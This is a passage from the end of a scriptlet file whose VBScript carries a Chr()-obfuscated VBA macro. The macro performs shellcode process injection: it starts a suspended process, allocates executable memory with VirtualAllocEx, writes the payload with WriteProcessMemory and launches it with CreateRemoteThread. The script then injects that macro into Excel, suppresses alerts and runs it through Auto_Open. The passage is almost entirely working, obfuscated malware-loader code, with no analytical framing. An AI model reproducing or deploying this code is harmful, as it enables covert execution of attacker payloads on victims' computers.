Chr(113)&Chr(102)&Chr(117)&Chr(32)&Chr(61)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(40)&Chr(85)&Chr(108)&Chr(110)&Chr(109)&Chr(97)&Chr(44)&Chr(32)&Chr(69)&Chr(120)&Chr(99)&Chr(100)& _ 
Chr(97)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(49)&Chr(38)&Chr(44)& _ 
Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(52)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)&Chr(32)&Chr(85)&Chr(108)&Chr(110)&Chr(109)&Chr(97)&Chr(44)&Chr(32)&Chr(73)&Chr(108)&Chr(109)&Chr(112)& _ 
Chr(111)&Chr(44)&Chr(32)&Chr(78)&Chr(109)&Chr(112)&Chr(105)&Chr(108)&Chr(97)&Chr(41)&Chr(10)&Chr(67)&Chr(111)&Chr(101)&Chr(102)&Chr(106)&Chr(32)&Chr(61)&Chr(32)&Chr(86)&Chr(105)&Chr(114)&Chr(116)&Chr(117)&Chr(97)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(69)& _ 
Chr(120)&Chr(40)&Chr(78)&Chr(109)&Chr(112)&Chr(105)&Chr(108)&Chr(97)&Chr(46)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(85)&Chr(66)&Chr(111)&Chr(117)&Chr(110)&Chr(100)&Chr(40)&Chr(68)&Chr(98)&Chr(114)& _ 
Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(41)&Chr(44)&Chr(32)&Chr(38)&Chr(72)&Chr(49)&Chr(48)&Chr(48)&Chr(48)&Chr(44)&Chr(32)&Chr(38)&Chr(72)&Chr(52)&Chr(48)&Chr(41)&Chr(10)&Chr(70)&Chr(111)&Chr(114)&Chr(32)&Chr(75)&Chr(121)&Chr(99)&Chr(102)&Chr(111)&Chr(113)&Chr(111)& _ 
Chr(99)&Chr(32)&Chr(61)&Chr(32)&Chr(76)&Chr(66)&Chr(111)&Chr(117)&Chr(110)&Chr(100)&Chr(40)&Chr(68)&Chr(98)&Chr(114)&Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(41)&Chr(32)&Chr(84)&Chr(111)&Chr(32)&Chr(85)&Chr(66)&Chr(111)&Chr(117)&Chr(110)&Chr(100)&Chr(40)&Chr(68)&Chr(98)& _ 
Chr(114)&Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(41)&Chr(10)&Chr(75)&Chr(111)&Chr(120)&Chr(32)&Chr(61)&Chr(32)&Chr(68)&Chr(98)&Chr(114)&Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(40)&Chr(75)&Chr(121)&Chr(99)&Chr(102)&Chr(111)&Chr(113)&Chr(111)&Chr(99)&Chr(41)&Chr(10)&Chr(66)& _ 
Chr(109)&Chr(113)&Chr(102)&Chr(117)&Chr(32)&Chr(61)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(77)&Chr(101)&Chr(109)&Chr(111)&Chr(114)&Chr(121)&Chr(40)&Chr(78)&Chr(109)&Chr(112)&Chr(105)&Chr(108)&Chr(97)& _ 
Chr(46)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(44)&Chr(32)&Chr(67)&Chr(111)&Chr(101)&Chr(102)&Chr(106)&Chr(32)&Chr(43)&Chr(32)&Chr(75)&Chr(121)&Chr(99)&Chr(102)&Chr(111)&Chr(113)&Chr(111)&Chr(99)&Chr(44)&Chr(32)&Chr(75)&Chr(111)&Chr(120)& _ 
Chr(44)&Chr(32)&Chr(49)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(41)&Chr(10)&Chr(78)&Chr(101)&Chr(120)&Chr(116)&Chr(32)&Chr(75)&Chr(121)&Chr(99)&Chr(102)&Chr(111)&Chr(113)&Chr(111)&Chr(99)&Chr(10)&Chr(66)&Chr(109)&Chr(113)& _ 
Chr(102)&Chr(117)&Chr(32)&Chr(61)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(82)&Chr(101)&Chr(109)&Chr(111)&Chr(116)&Chr(101)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(40)&Chr(78)&Chr(109)&Chr(112)&Chr(105)&Chr(108)&Chr(97)&Chr(46)&Chr(104)& _ 
Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(67)&Chr(111)&Chr(101)&Chr(102)&Chr(106)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(48)&Chr(41)&Chr(10)&Chr(69)& _ 
Chr(110)&Chr(100)&Chr(32)&Chr(83)&Chr(117)&Chr(98)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(10)& _ 
Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(83)&Chr(117)&Chr(98)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(87)&Chr(111)&Chr(114)&Chr(107)&Chr(98)&Chr(111)&Chr(111)&Chr(107)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)&Chr(65)&Chr(117)&Chr(116)&Chr(111)& _ 
Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(83)&Chr(117)&Chr(98)
xlmodule.CodeModule.AddFromString strCode
objExcel.DisplayAlerts = False
objExcel.Run "Auto_Open"
objWorkbook.Close False
objExcel.Quit
End Function

]]>
</script>
</scriptlet>